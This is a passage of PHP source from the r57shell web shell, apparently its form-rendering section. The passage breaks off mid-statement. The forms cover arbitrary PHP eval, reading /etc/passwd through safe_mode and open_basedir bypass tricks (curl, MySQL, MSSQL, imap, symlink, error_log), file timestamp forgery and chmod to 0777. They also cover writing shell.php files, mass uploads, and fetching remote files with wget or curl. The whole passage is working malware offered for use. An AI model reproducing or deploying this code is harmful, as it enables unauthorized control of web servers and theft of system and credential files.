2656. echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2657. echo $te.'</div>'.$table_end1.$fe;
2658. }
2659. else{
2660. echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
2661. echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
2662. echo $te.'</div>'.$table_end1.$fe;
2663. }
2664. echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
2665. echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
2666. echo $te.'</div>'.$table_end1.$fe;
2667.  
2668. if($safe_mode || $open_basedir){
2669. echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
2670. echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
2671. echo $te.'</div>'.$table_end1.$fe;
2672. }
2673.  
2674. if($unix && @function_exists('touch')){
2675. echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts;
2676. echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($dir."/r57shell.php")))
2677. .ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>"
2678. .ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):(""))));
2679. echo sr(15,"<b> or set  Day".$arrow."</b>",
2680. '
2681.  
2682. <select name="day" size="1">
2683. <option value="01">1</option>
2684. <option value="02">2</option>
2685. <option value="03">3</option>
2686. <option value="04">4</option>
2687. <option value="05">5</option>
2688. <option value="06">6</option>
2689. <option value="07">7</option>
2690. <option value="08">8</option>
2691.  
2692. <option value="09">9</option>
2693. <option value="10">10</option>
2694. <option value="11">11</option>
2695. <option value="12">12</option>
2696. <option value="13">13</option>
2697. <option value="14">14</option>
2698. <option value="15">15</option>
2699. <option value="16">16</option>
2700. <option value="17">17</option>
2701.  
2702. <option value="18">18</option>
2703. <option value="19">19</option>
2704. <option value="20">20</option>
2705. <option value="21">21</option>
2706. <option value="22">22</option>
2707. <option value="23">23</option>
2708. <option value="24">24</option>
2709. <option value="25">25</option>
2710. <option value="26">26</option>
2711.  
2712. <option value="27">27</option>
2713. <option value="28">28</option>
2714. <option value="29">29</option>
2715. <option value="30">30</option>
2716. <option value="31">31</option>
2717. </select>'
2718. .ws(4)."<b>Month".$arrow."</b>"
2719. .'
2720. <select name="month" size="1">
2721. <option value="January">January</option>
2722. <option value="February">February</option>
2723.  
2724. <option value="March">March</option>
2725. <option value="April">April</option>
2726. <option value="May">May</option>
2727. <option value="June">June</option>
2728. <option value="July">July</option>
2729. <option value="August">August</option>
2730. <option value="September">September</option>
2731. <option value="October">October</option>
2732. <option value="November">November</option>
2733.  
2734. <option value="December">December</option>
2735. </select>'
2736. .ws(4)."<b>Year".$arrow."</b>"
2737. .'
2738. <select name="year" size="1">
2739. <option value="1998">1998</option>
2740. <option value="1999">1999</option>
2741. <option value="2000">2000</option>
2742. <option value="2001">2001</option>
2743. <option value="2002">2002</option>
2744. <option value="2003">2003</option>
2745.  
2746. <option value="2004">2004</option>
2747. <option value="2005">2005</option>
2748. <option value="2006">2006</option>
2749. <option value="2006">2007</option>
2750. <option value="2006">2008</option>
2751. <option value="2006">2009</option>
2752. <option value="2006">2010</option>
2753. </select>'
2754. .ws(4)."<b>Hour".$arrow."</b>"
2755. .'
2756.  
2757. <select name="chasi" size="1">
2758. <option value="01">01</option>
2759. <option value="02">02</option>
2760. <option value="03">03</option>
2761. <option value="04">04</option>
2762. <option value="05">05</option>
2763. <option value="06">06</option>
2764. <option value="07">07</option>
2765. <option value="08">08</option>
2766.  
2767. <option value="09">09</option>
2768. <option value="10">10</option>
2769. <option value="11">11</option>
2770. <option value="12">12</option>
2771. <option value="13">13</option>
2772. <option value="14">14</option>
2773. <option value="15">15</option>
2774. <option value="16">16</option>
2775. <option value="17">17</option>
2776.  
2777. <option value="18">18</option>
2778. <option value="19">19</option>
2779. <option value="20">20</option>
2780. <option value="21">21</option>
2781. <option value="22">22</option>
2782. <option value="23">23</option>
2783. <option value="24">24</option>
2784. </select>'
2785. .ws(4)."<b>Minute".$arrow."</b>"
2786. .'
2787.  
2788. <select name="minutes" size="1">
2789. <option value="01">1</option>
2790. <option value="02">2</option>
2791. <option value="03">3</option>
2792. <option value="04">4</option>
2793. <option value="05">5</option>
2794. <option value="06">6</option>
2795. <option value="07">7</option>
2796. <option value="08">8</option>
2797.  
2798. <option value="09">9</option>
2799. <option value="10">10</option>
2800. <option value="11">11</option>
2801. <option value="12">12</option>
2802. <option value="13">13</option>
2803. <option value="14">14</option>
2804. <option value="15">15</option>
2805. <option value="16">16</option>
2806. <option value="17">17</option>
2807.  
2808. <option value="18">18</option>
2809. <option value="19">19</option>
2810. <option value="20">20</option>
2811. <option value="21">21</option>
2812. <option value="22">22</option>
2813. <option value="23">23</option>
2814. <option value="24">24</option>
2815. <option value="25">25</option>
2816. <option value="26">26</option>
2817.  
2818. <option value="27">27</option>
2819. <option value="28">28</option>
2820. <option value="29">29</option>
2821. <option value="30">30</option>
2822. <option value="31">31</option>
2823. <option value="32">32</option>
2824. <option value="33">33</option>
2825. <option value="34">34</option>
2826. <option value="35">35</option>
2827.  
2828. <option value="36">36</option>
2829. <option value="37">37</option>
2830. <option value="38">38</option>
2831. <option value="39">39</option>
2832. <option value="40">40</option>
2833. <option value="41">41</option>
2834. <option value="42">42</option>
2835. <option value="43">43</option>
2836. <option value="44">44</option>
2837.  
2838. <option value="45">45</option>
2839. <option value="46">46</option>
2840. <option value="47">47</option>
2841. <option value="48">48</option>
2842. <option value="49">49</option>
2843. <option value="50">50</option>
2844. <option value="51">51</option>
2845. <option value="52">52</option>
2846. <option value="53">53</option>
2847.  
2848. <option value="54">54</option>
2849. <option value="55">55</option>
2850. <option value="56">56</option>
2851. <option value="57">57</option>
2852. <option value="58">58</option>
2853. <option value="59">59</option>
2854. </select>'
2855. .ws(4)."<b>Second".$arrow."</b>"
2856. .'
2857. <select name="second" size="1">
2858. <option value="01">1</option>
2859.  
2860. <option value="02">2</option>
2861. <option value="03">3</option>
2862. <option value="04">4</option>
2863. <option value="05">5</option>
2864. <option value="06">6</option>
2865. <option value="07">7</option>
2866. <option value="08">8</option>
2867. <option value="09">9</option>
2868. <option value="10">10</option>
2869.  
2870. <option value="11">11</option>
2871. <option value="12">12</option>
2872. <option value="13">13</option>
2873. <option value="14">14</option>
2874. <option value="15">15</option>
2875. <option value="16">16</option>
2876. <option value="17">17</option>
2877. <option value="18">18</option>
2878. <option value="19">19</option>
2879.  
2880. <option value="20">20</option>
2881. <option value="21">21</option>
2882. <option value="22">22</option>
2883. <option value="23">23</option>
2884. <option value="24">24</option>
2885. <option value="25">25</option>
2886. <option value="26">26</option>
2887. <option value="27">27</option>
2888. <option value="28">28</option>
2889.  
2890. <option value="29">29</option>
2891. <option value="30">30</option>
2892. <option value="31">31</option>
2893. <option value="32">32</option>
2894. <option value="33">33</option>
2895. <option value="34">34</option>
2896. <option value="35">35</option>
2897. <option value="36">36</option>
2898. <option value="37">37</option>
2899.  
2900. <option value="38">38</option>
2901. <option value="39">39</option>
2902. <option value="40">40</option>
2903. <option value="41">41</option>
2904. <option value="42">42</option>
2905. <option value="43">43</option>
2906. <option value="44">44</option>
2907. <option value="45">45</option>
2908. <option value="46">46</option>
2909.  
2910. <option value="47">47</option>
2911. <option value="48">48</option>
2912. <option value="49">49</option>
2913. <option value="50">50</option>
2914. <option value="51">51</option>
2915. <option value="52">52</option>
2916. <option value="53">53</option>
2917. <option value="54">54</option>
2918. <option value="55">55</option>
2919.  
2920. <option value="56">56</option>
2921. <option value="57">57</option>
2922. <option value="58">58</option>
2923. <option value="59">59</option>
2924. </select>'
2925. .in('hidden','cmd',0,'touch')
2926. .in('hidden','dir',0,$dir)
2927. .ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2928. echo $te.'</div>'.$table_end1.$fe;
2929. }
2930.  
2931. $select='';
2932. if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";}
2933. if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";}
2934. if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";}
2935. if($unix && $select){
2936. echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts;
2937. echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($dir."/r57shell.php"))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2938. echo $te.'</div>'.$table_end1.$fe;
2939. }
2940.  
2941. if(!$safe_mode){
2942. $aliases2 = '';
2943. foreach ($aliases as $alias_name=>$alias_cmd)
2944.  {
2945.  $aliases2 .= "<option>$alias_name</option>";
2946.  }
2947. echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id7').$table_up2.div('id7').$ts;
2948. echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2949. echo $te.'</div>'.$table_end1.$fe;
2950. }
2951.  
2952. echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id8').$table_up2.div('id8').$ts;
2953. echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2954. echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2955. echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
2956. echo $te.'</div>'.$table_end1.$fe;
2957.  
2958. if(!$safe_mode && $unix){
2959. echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts;
2960. echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2961. echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2962. echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
2963. echo $te.'</div>'.$table_end1.$fe;
2964. }
2965.  
2966. echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id10').$table_up2.$font;
2967. echo "<div align=center>".div('id10')."<textarea name=php_eval cols=100 rows=10>";
2968. echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");"));
2969. echo "</textarea>";
2970. echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
2971. echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
2972. echo "</div></div></font>";
2973. echo $table_end1.$fe;
2974.  
2975. if($safe_mode || $open_basedir)
2976. {
2977. echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
2978. echo "<table class=table1 width=100% align=center>";
2979. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2980. echo $te.'</div>'.$table_end1.$fe;
2981. }
2982.  
2983. if(($safe_mode || $open_basedir) && $curl_on && @version_compare(@phpversion(),"5.2.0")<=0)
2984. {
2985. echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts;
2986. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2987. echo $te.'</div>'.$table_end1.$fe;
2988. }
2989.  
2990. if(($safe_mode || $open_basedir) && $mysql_on)
2991. {
2992. echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id13').$table_up2.div('id13').$ts;
2993. echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
2994. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2995. echo $te.'</div>'.$table_end1.$fe;
2996. }
2997.  
2998. if(($safe_mode || $open_basedir) && $mssql_on)
2999. {
3000. echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts;
3001. echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
3002. echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
3003. echo $te.'</div>'.$table_end1.$fe;
3004. }
3005.  
3006. if(($safe_mode || $open_basedir) && $unix && @function_exists('mb_send_mail') && @version_compare(@phpversion(),"5.2.0")<=0){
3007. echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts;
3008. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
3009. echo $te.'</div>'.$table_end1.$fe;
3010. }
3011.  
3012. if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_list') && @version_compare(@phpversion(),"5.2.0")<=0){
3013. echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id20').$table_up2.div('id20').$ts;
3014. echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
3015. echo $te.'</div>'.$table_end1.$fe;
3016. }
3017.  
3018. if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_body') && @version_compare(@phpversion(),"5.2.0")<=0){
3019. echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts;
3020. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
3021. echo $te.'</div>'.$table_end1.$fe;
3022. }
3023.  
3024. if(($safe_mode || $open_basedir) && @function_exists('copy') && @version_compare(@phpversion(),"5.2.0")<=0)
3025. {
3026. echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts;
3027. echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
3028. echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
3029. echo $te.'</div>'.$table_end1.$fe;  
3030. }
3031.  
3032. if(($safe_mode || $open_basedir) && @function_exists('ini_restore') && @version_compare(@phpversion(),"5.2.0")<=0){
3033. echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts;
3034. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
3035. echo $te.'</div>'.$table_end1.$fe;
3036. }
3037.  
3038. if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.0.0")<0){
3039. echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts;
3040. echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
3041. echo $te.'</div>'.$table_end1.$fe;
3042. }
3043.  
3044. if(($safe_mode || $open_basedir) && @function_exists('glob') && @version_compare(@phpversion(),"5.2.2")<=0){
3045. echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts;
3046. echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test18_file'])?($_POST['test18_file']):($dir))).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
3047. echo $te.'</div>'.$table_end1.$fe;
3048. }
3049.  
3050. if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
3051. {
3052. echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts;
3053. echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):("/tmp/test.zip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
3054. echo $te.'</div>'.$table_end1.$fe;  
3055. }
3056.  
3057. if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
3058. {
3059. echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts;
3060. echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):("/tmp/test.bzip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
3061. echo $te.'</div>'.$table_end1.$fe;  
3062. }
3063.  
3064. if(($safe_mode || $open_basedir) && @function_exists('error_log') && @version_compare(@phpversion(),"5.2.2")<=0)
3065. {
3066. echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up2.div('id27').$ts;
3067. echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13'));
3068. echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
3069. echo $te.'</div>'.$table_end1.$fe;  
3070. }
3071.  
3072. if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
3073. {
3074. echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts;
3075. echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14'));
3076. echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
3077. echo $te.'</div>'.$table_end1.$fe;  
3078. }
3079.  
3080. if(($safe_mode || $open_basedir) && @function_exists('readfile') && @version_compare(@phpversion(),"5.2.2")<=0)
3081. {
3082. echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts;
3083. echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15'));
3084. echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
3085. echo $te.'</div>'.$table_end1.$fe;  
3086. }
3087.  
3088. if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.4")<=0)
3089. {
3090. echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts;
3091. echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."/test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
3092. echo $te.'</div>'.$table_end1.$fe;  
3093. }
3094.  
3095. if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0)
3096. {
3097. echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts;
3098. echo "<tr><td valign=top width=70%>".$ts;
3099. echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
3100. echo $te."</td><td valign=top width=30%>".$ts;
3101. echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
3102. echo $te."</td></tr>";
3103. echo $te.'</div>'.$table_end1;  
3104. }
3105.  
3106. if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0)
3107. {
3108. echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts;
3109. echo "<tr><td valign=top width=70%>".$ts;
3110. echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
3111. echo $te."</td><td valign=top width=30%>".$ts;
3112. echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
3113. echo $te."</td></tr>";
3114. echo $te.'</div>'.$table_end1;  
3115. }
3116.  
3117.  
3118. if((!@function_exists('ini_get')) || @ini_get('file_uploads')){
3119. echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
3120. echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts;
3121. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,''));
3122. echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
3123. echo $te.'</div>'.$table_end1.$fe;
3124. }
3125.  
3126.  
3127. if((!@function_exists('ini_get')) || @ini_get('file_uploads')){
3128. echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
3129. echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts;
3130. echo "<tr><td valign=top width=50%>".$ts;
3131. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,''));
3132. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,''));
3133. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,''));
3134. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,''));
3135. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,''));
3136. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,''));
3137. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,''));
3138. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,''));
3139. echo $te."</td><td valign=top width=50%>".$ts;
3140. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,''));
3141. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,''));
3142. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,''));
3143. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,''));
3144. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,''));
3145. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,''));
3146. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,''));
3147. echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
3148. echo $te."</td></tr>";
3149. echo $te.'</div>'.$table_end1.$fe;
3150. }
3151.  
3152.  
3153. $select='';
3154. if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('fopen'))){$select = "<option value=\"fopen\">fopen</option>";}
3155. if(!$safe_mode){
3156.  if(which('wget')){$select .= "<option value=\"wget\">wget</option>";}
3157.  if(which('fetch')){$select .= "<option value=\"fetch\">fetch</option>";}
3158.  if(which('lynx')){$select .= "<option value=\"lynx\">lynx</option>";}
3159.  if(which('links')){$select .= "<option value=\"links\">links</option>";}
3160.  if(which('curl')){$select .= "<option value=\"curl\">curl</option>";}
3161.  if(which('GET')){$select .= "<option value=\"GET\">GET</option>";}
3162. }
3163. if($select){
3164.  echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts;
3165.  echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\">".$select
3166. ."</select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
